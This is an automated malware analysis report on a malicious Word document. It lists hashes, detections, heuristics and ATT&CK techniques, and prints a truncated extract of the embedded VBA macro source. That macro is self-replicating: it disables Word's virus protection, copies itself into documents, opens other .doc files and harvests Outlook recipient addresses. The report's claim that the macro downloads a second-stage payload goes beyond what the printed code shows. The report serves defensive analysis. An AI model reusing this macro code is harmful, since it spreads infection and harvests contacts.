Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 59b92d6befe0dca6…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 42.5 KB | Created: 1997-09-17 11:18:00 | Authoring application: Microsoft Word 8.0 | First seen: 2012-06-14
MD5: dd554033ba5826f18893ed4103edd039
SHA-1: b23ace2c1c72597696008962b8e5f7c35b8d8826
SHA-256: 59b92d6befe0dca6339a128258ed6595b208c9a03dba58b33706dc86437e0615
Risk Score: 260

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros, specifically a Document_Open macro that utilizes CreateObject. This indicates an attempt to execute malicious code. The presence of ClamAV detections like Win.Trojan.Pivis-2 and Win.Trojan.C-286 further confirms its malicious nature. The macro's functionality, though truncated, suggests it is designed to download and execute a second-stage payload, consistent with a common phishing attachment attack vector.

Heuristics (5)

  • ClamAV: Win.Trojan.Pivis-2 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected (severity: medium; 3 related findings; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Document_Open macro (severity: high; rule: OLE_VBA_DOCOPEN)
    Document contains a Document_Open auto-execution macro
  • CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ)
    Macro code calls CreateObject
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 21177 bytes
SHA-256: f5e4db21ca46fe8d413e7df59855152659f5a263e65fbd3bad7f53fd376abfb4
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit 'Cod
Private Declare Function RasEnumConnections Lib "RasApi32.dll" Alias "RasEnumConnectionsA" (lpRasCon As Any, lpcb As Long, lpcConnections As Long) As Long
Private Declare Function RasGetConnectStatus Lib "RasApi32.dll" Alias "RasGetConnectStatusA" (ByVal hRasCon As Long, lpStatus As Any) As Long
Private Const RAS95_MaxEntryName = 256: Private Const RAS95_MaxDeviceType = 16: Private Const RAS95_MaxDeviceName = 32
Private Type RASCONNSTATUS95: dwSize As Long: RasConnState As Long: dwError As Long: szDeviceType(RAS95_MaxDeviceType) As Byte: szDeviceName(RAS95_MaxDeviceName) As Byte: End Type
Private Type RASCONN95: dwSize As Long: hRasCon As Long: szEntryName(RAS95_MaxEntryName) As Byte: szDeviceType(RAS95_MaxDeviceType) As Byte: szDeviceName(RAS95_MaxDeviceName) As Byte: End Type
Dim Copia As Boolean
Private Sub Document_New()
On Error Resume Next
    Copia = True: Document_Open
End Sub
Private Sub Document_Open()
On Error Resume Next
Dim TRasCon(255) As RASCONN95, Lg As Long, lPcon As Long, RetVal As Long, Tstatus As RASCONNSTATUS95
Dim A As Object, M As Object, Envia As Object, U As Object, Nao As Boolean, Doc As Object, F As Object
Dim A2 As Integer, I As Integer, Conteudo As String, Email As New Collection, I1 As Integer
Dim D As Document, Appli As New Application, Macro As String, IsConnected As Boolean
    Application.EnableCancelKey = wdCancelDisabled
    With Options
        .ConfirmConversions = False: .VirusProtection = False: .SaveNormalPrompt = False
    End With
    A2 = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
    Macro = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, A2)
    Set Doc = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
    Conteudo = Doc.Lines(1, 1)
    If Conteudo <> "Option Explicit 'Cod" Then
        If Conteudo <> "" Then Doc.DeleteLines 1, Doc.CountOfLines
        Doc.InsertLines 1, Macro
        With Dialogs(wdDialogFileSummaryInfo): .Title = "LUCIA": .Author = "LUCIA": .Execute: End With
        If ActiveDocument.Saved = False And UCase(Right(ActiveDocument.FullName, 3)) = "DOC" Then ActiveDocument.Save
    End If
    If Dir(Options.DefaultFilePath(wdDocumentsPath) & "\UT987456.117") <> "" Then
        Exit Sub
    End If
    If Copia Then Exit Sub
    
    TRasCon(0).dwSize = 412
    Lg = 256 * TRasCon(0).dwSize
    RetVal = RasEnumConnections(TRasCon(0), Lg, lPcon)
    Tstatus.dwSize = 160
    RetVal = RasGetConnectStatus(TRasCon(0).hRasCon, Tstatus)
    IsConnected = (Tstatus.RasConnState = &H2000)
    Set A = CreateObject("Outlook.Application")
    If Err.Number <> 0 Or Not IsConnected Then
        Open Options.DefaultFilePath(wdDocumentsPath) & "\UT987456.117" For Output As #1
        Close 1
        Set F = Application.FileSearch
        F.FileName = "*.doc"
        F.LookIn = Options.DefaultFilePath(wdDocumentsPath)
        F.SearchSubFolders = False
        F.Execute
        A2 = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
        If F.FoundFiles.Count > 0 Then
            For I1 = 1 To F.FoundFiles.Count
                Set D = Appli.Documents.Open(F.FoundFiles(I1))
            Next I1
        End If
        Kill Options.DefaultFilePath(wdDocumentsPath) & "\UT987456.117"
    Else
        Set U = A.GetNamespace("MAPI"): Set M = U.GetDefaultFolder(5)
        For I = 1 To M.Items.Count
            Conteudo = Trim(M.Items(I).To)
            If Left(Conteudo, 1) = "'" And Right(Conteudo, 1) = "'" Then Conteudo = Mid(Conteudo, 2, Len(Conteudo) - 2)
            If Conteudo Like "*@*" And Trim(Conteudo) <> "" Then
                If Email.Count <> 0 Then
                    For A2 = 1 To Email.Count
                        If Conteudo = Email.Item(A2) Then
                     
... (truncated)